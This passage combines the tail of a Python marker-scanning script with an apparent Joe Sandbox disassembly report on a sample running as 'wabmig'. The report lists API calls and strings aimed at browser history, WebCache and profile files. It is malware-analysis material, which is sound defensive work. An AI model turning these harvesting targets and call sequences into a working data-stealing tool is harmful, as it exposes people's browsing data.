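        + r"Waterfox\Profiles".encode("utf-16-le")          # offset 72, 34 bytes
        + b"\x00" * 8
        + b"no such vfs: %s\x00NOCASE\x00RTRIM\x00"          # offsets 114, 130, 137
    )


if __name__ == "__main__":
    # Replace build_sample() with open(path, "rb").read() to scan a real dump.
    found = find_markers(build_sample())
    for h in found:
        print(f"{h.offset:#010x}  {h.encoding:10s}  {h.marker}")
    print("verdict:", classify(found))
```

On a real dump, run find_markers over the whole file and compare the reported offsets with the memory-dump source in the blocks above (image base 00400000) to locate the functions that reference each constant.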
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040A824
                                                                            • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                            • wcscpy.MSVCRT ref: 0040A854
                                                                            • wcscat.MSVCRT ref: 0040A86A
                                                                            • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                            • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                            • String ID:
                                                                            • API String ID: 669240632-0
                                                                            • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                            • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                            • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                            • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                            APIs
                                                                            • wcschr.MSVCRT ref: 00414458
                                                                            • _snwprintf.MSVCRT ref: 0041447D
                                                                            • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                            • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                            • String ID: "%s"
                                                                            • API String ID: 1343145685-3297466227
                                                                            • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                            • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                            • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                            • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                            • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                            • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: AddressHandleModuleProcProcessTimes
                                                                            • String ID: GetProcessTimes$kernel32.dll
                                                                            • API String ID: 1714573020-3385500049
                                                                            • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                            • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                            • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                            • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                            APIs
                                                                            • memset.MSVCRT ref: 004087D6
                                                                              • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                              • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                            • memset.MSVCRT ref: 00408828
                                                                            • memset.MSVCRT ref: 00408840
                                                                            • memset.MSVCRT ref: 00408858
                                                                            • memset.MSVCRT ref: 00408870
                                                                            • memset.MSVCRT ref: 00408888
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                            • String ID:
                                                                            • API String ID: 2911713577-0
                                                                            • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                            • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                            • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                            • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                            APIs
                                                                            • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                                            • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                                            • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memcmp
                                                                            • String ID: @ $SQLite format 3
                                                                            • API String ID: 1475443563-3708268960
                                                                            • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                            • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                            • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                            • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                            APIs
                                                                              • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                            • memset.MSVCRT ref: 00414C87
                                                                            • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                            • wcscpy.MSVCRT ref: 00414CFC
                                                                              • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                            Strings
                                                                            • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: AddressCloseProcVersionmemsetwcscpy
                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                            • API String ID: 2705122986-2036018995
                                                                            • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                            • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                            • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                            • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: _wcsicmpqsort
                                                                            • String ID: /nosort$/sort
                                                                            • API String ID: 1579243037-1578091866
                                                                            • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                            • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                            • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                            • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040E60F
                                                                            • memset.MSVCRT ref: 0040E629
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                            Strings
                                                                            • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                            • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                                            • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                            • API String ID: 3354267031-2114579845
                                                                            • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                            • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                            • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                            • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                            APIs
                                                                            • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                            • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                            • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                            • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Resource$FindLoadLockSizeof
                                                                            • String ID:
                                                                            • API String ID: 3473537107-0
                                                                            • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                            • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                            • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                            • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                            APIs
                                                                            Strings
                                                                            • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memset
                                                                            • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                            • API String ID: 2221118986-1725073988
                                                                            • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                            • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                            • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                            • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                            APIs
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                                                                            • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ??3@DeleteObject
                                                                            • String ID: r!A
                                                                            • API String ID: 1103273653-628097481
                                                                            • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                            • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                            • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                            • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                            APIs
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ??2@
                                                                            • String ID:
                                                                            • API String ID: 1033339047-0
                                                                            • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                            • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                            • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                            • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                            APIs
                                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                            • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$memcmp
                                                                            • String ID: $$8
                                                                            • API String ID: 2808797137-435121686
                                                                            • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                            • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                            • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                            • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                            APIs
                                                                              • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                              • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                              • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                              • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                              • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                              • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                              • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                              • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                              • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                            • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                              • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                              • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                              • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,774D2EE0), ref: 0040E3EC
                                                                            • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                            • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                              • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                              • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                              • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                            • String ID:
                                                                            • API String ID: 1979745280-0
                                                                            • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                            • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                            • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                            • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                            APIs
                                                                              • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                              • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                              • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                              • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                            • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                            • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                            • free.MSVCRT ref: 00418803
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                            • String ID:
                                                                            • API String ID: 1355100292-0
                                                                            • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                            • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                            • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                            • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                            APIs
                                                                              • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                              • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                              • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                              • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                            • memset.MSVCRT ref: 00403A55
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                              • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                              • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                            • String ID: history.dat$places.sqlite
                                                                            • API String ID: 2641622041-467022611
                                                                            • Opcode ID: 7e5fa77ffbd80df454c8f06c208cb8abd3a99e536342b00205f9bee392087e79
                                                                            • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                            • Opcode Fuzzy Hash: 7e5fa77ffbd80df454c8f06c208cb8abd3a99e536342b00205f9bee392087e79
                                                                            • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                            APIs
                                                                              • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                              • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                              • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                            • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                            • GetLastError.KERNEL32 ref: 00417627
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$File$PointerRead
                                                                            • String ID:
                                                                            • API String ID: 839530781-0
                                                                            • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                            • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                            • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                            • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: FileFindFirst
                                                                            • String ID: *.*$index.dat
                                                                            • API String ID: 1974802433-2863569691
                                                                            • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                            • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                            • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                            • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                            APIs
                                                                            • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                            • GetLastError.KERNEL32 ref: 004175A2
                                                                            • GetLastError.KERNEL32 ref: 004175A8
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$FilePointer
                                                                            • String ID:
                                                                            • API String ID: 1156039329-0
                                                                            • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                            • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                            • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                            • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                            APIs
                                                                            • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                            • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                            • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: File$CloseCreateHandleTime
                                                                            • String ID:
                                                                            • API String ID: 3397143404-0
                                                                            • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                            • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                            • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
